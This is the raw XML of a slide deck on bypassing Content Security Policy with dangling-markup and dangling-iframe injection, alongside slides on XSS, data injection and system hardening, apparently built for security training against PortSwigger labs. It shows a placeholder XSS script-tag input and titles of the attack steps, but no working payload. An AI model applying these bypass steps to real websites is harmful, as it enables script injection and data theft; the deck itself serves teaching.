                </a:solidFill>
              </a:rPr>
              <a:t>Minimize </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>External Footprint</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-MY" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Manage Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-MY" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Harden Remote Sessions</a:t>
            </a:r>
            <a:endParaRPr lang="es" dirty="0" smtClean="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24513" y="3015031"/>
            <a:ext cx="2805006"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MY" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sensitive Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Storage Processing &amp; Transmission</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-MY" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Perimeter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Controls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-MY" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Audit logging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:endParaRPr lang="en-MY" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:endParaRPr lang="en-MY" dirty="0" smtClean="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24513" y="379348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endParaRPr lang="es" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Network Configuration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Intrusion Prevention System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Intrusion Detection System</a:t>
            </a:r>
            <a:endParaRPr lang="es" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:endParaRPr lang="es" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:endParaRPr lang="es" dirty="0" smtClean="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011064"/>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pPr>
            <a:endParaRPr lang="es" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0"/>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Privilege escalation detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0"/>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Code obfuscation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0"/>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>White-box </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cryptography</a:t>
            </a:r>
            <a:endParaRPr lang="es" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="es" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="es" dirty="0" smtClean="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7" name="Google Shape;227;p23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="737087" y="304587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pPr>
            <a:r>
              <a:rPr lang="es" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Give at least 10 Script and explain the usage and functions </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:endParaRPr lang="es" dirty="0" smtClean="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pPr>
            <a:r>
              <a:rPr lang="es" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Give at least 10 Script and explain the usage and functions</a:t>
            </a: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408670" y="2085751"/>
            <a:ext cx="2342600" cy="21102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Application Hardening</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MY" dirty="0" smtClean="0"/>
              <a:t>Windows OS Hardening</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Ubuntu OS Hardening</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="234" name="Google Shape;234;p23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" idx="19"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6424513" y="198765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Server Hardening</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lvl="0">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>Database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" smtClean="0"/>
              <a:t>Hardening</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Network Hardening</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="257" name="Google Shape;257;p23"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1711395"/>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6983039" y="-57609"/>
            <a:ext cx="1849261" cy="1849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565" y="1870852"/>
            <a:ext cx="743022" cy="7430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9627" y="2911446"/>
            <a:ext cx="504451" cy="50445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7977" y="3727921"/>
            <a:ext cx="635322" cy="63532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0569" y="1928809"/>
            <a:ext cx="632993" cy="632993"/>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1273" y="2788463"/>
            <a:ext cx="729068" cy="729068"/>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5928" y="3727921"/>
            <a:ext cx="624413" cy="624413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="400728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dirty="0" smtClean="0"/>
              <a:t>Type Of Attacks That CSP Blocked</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="279" name="Google Shape;279;p25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="818727" y="3429436"/>
            <a:ext cx="3075695" cy="3165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XSS Injection</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="280" name="Google Shape;280;p25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5414665" y="351782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Data Injections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3" y="1466225"/>
            <a:ext cx="3631286" cy="19064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665" y="1411921"/>
            <a:ext cx="1893957" cy="201503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699" y="1737500"/>
            <a:ext cx="4322664"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smtClean="0"/>
              <a:t>Cross-Site-Scripting (XSS) Injection</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="297" name="Google Shape;297;p26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4930150" y="2344100"/>
            <a:ext cx="3457500" cy="1420500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-   It works by executing JavaScript Code into the website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hacker would input JavaScript Code instead of normal letter in form using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> code below:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0"/>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-    &lt;script&gt; JavaScript Code &lt;/script&gt;</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44" y="401801"/>
            <a:ext cx="4541375" cy="267139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44" y="3204775"/>
            <a:ext cx="4391591" cy="1787820"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="808986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97220" y="2387829"/>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4400" dirty="0" smtClean="0"/>
              <a:t>The Effects of XSS and Data Injections</a:t>
            </a:r>
            <a:endParaRPr sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="291" name="Google Shape;291;p25"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="265651" y="2908667"/>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99304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Data Theft (Data Injection)</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448" y="1733002"/>
            <a:ext cx="4512794" cy="225639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53338"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="486871" y="1331718"/>
            <a:ext cx="3493071" cy="3161915"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2071954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Site Defacement</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7030" t="4614" r="15473" b="18773"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="226181" y="1513037"/>
            <a:ext cx="4595378" cy="293397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007" r="17051"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5025911" y="1869729"/>
            <a:ext cx="3950561" cy="2220587"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3006859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226181" y="23668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3200" dirty="0" smtClean="0"/>
              <a:t>Malware Distribution</a:t>
            </a:r>
            <a:endParaRPr sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="291" name="Google Shape;291;p25"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="272231" y="843286"/>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87" y="1139142"/>
            <a:ext cx="2991119" cy="38004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426" y="1322262"/>
            <a:ext cx="4979800" cy="3488444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4083025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1370</TotalTime>
  <Words>1313</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>219</Paragraphs>
  <Slides>32</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Roboto Black</vt:lpstr>
      <vt:lpstr>Didact Gothic</vt:lpstr>
      <vt:lpstr>Proxima Nova Semibold</vt:lpstr>
      <vt:lpstr>Roboto Light</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Proxima Nova</vt:lpstr>
      <vt:lpstr>Roboto Mono Thin</vt:lpstr>
      <vt:lpstr>Algerian</vt:lpstr>
      <vt:lpstr>Bree Serif</vt:lpstr>
      <vt:lpstr>WEB PROPOSAL</vt:lpstr>
      <vt:lpstr>Slidesgo Final Pages</vt:lpstr>
      <vt:lpstr> CSP BYPASSING USING LATEST TECHNIQUE</vt:lpstr>
      <vt:lpstr>What Will You Learn?</vt:lpstr>
      <vt:lpstr>Content Security Policy (CSP)</vt:lpstr>
      <vt:lpstr>Type Of Attacks That CSP Blocked</vt:lpstr>
      <vt:lpstr>Cross-Site-Scripting (XSS) Injection</vt:lpstr>
      <vt:lpstr>The Effects of XSS and Data Injections</vt:lpstr>
      <vt:lpstr>Data Theft (Data Injection)</vt:lpstr>
      <vt:lpstr>Site Defacement</vt:lpstr>
      <vt:lpstr>Malware Distribution</vt:lpstr>
      <vt:lpstr>How Does CSP Works?</vt:lpstr>
      <vt:lpstr>Directives in CSP</vt:lpstr>
      <vt:lpstr>How Directives Works in CSP</vt:lpstr>
      <vt:lpstr>— There’s a lot way to bypass CSP. And today we will use the latest technique, which is bypassing CSP with Dangling Iframe.</vt:lpstr>
      <vt:lpstr>Dangling Markup Injection</vt:lpstr>
      <vt:lpstr>Example of Dangling Markup Injection</vt:lpstr>
      <vt:lpstr>What is CSRF Token</vt:lpstr>
      <vt:lpstr>Cross-Domain Attack Preview</vt:lpstr>
      <vt:lpstr>Cross-Domain Iframe</vt:lpstr>
      <vt:lpstr>Bypassing CSP With Dangling Iframe</vt:lpstr>
      <vt:lpstr>1. Perform Dangling Markup Injection Without &lt;img-src Directive</vt:lpstr>
      <vt:lpstr>2. Start Hackbility inspector</vt:lpstr>
      <vt:lpstr>3. Cross-Domain iframe issues</vt:lpstr>
      <vt:lpstr> Determine if the name exists or not.</vt:lpstr>
      <vt:lpstr> 4. Change the location of the iframe to about:blank </vt:lpstr>
      <vt:lpstr> Conclusion</vt:lpstr>
      <vt:lpstr>Proof Of Concept (POC)</vt:lpstr>
      <vt:lpstr>PORTSWIGGER LABS</vt:lpstr>
      <vt:lpstr>Exploit to Solve the Labs</vt:lpstr>
      <vt:lpstr>RESOURCES</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Attacking Choose 1 Topic To Demonstrate Live</vt:lpstr>
      <vt:lpstr>Defensive Choose 1 Topic To Present Live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BYPASSING USING LATEST TECHNIQUE</dc:title>
  <dc:creator>Ryden</dc:creator>
  <cp:lastModifiedBy>ASUS</cp:lastModifiedBy>
  <cp:revision>81</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-07-04T08:23:51Z</dcterms:modified>
</cp:coreProperties>
</file>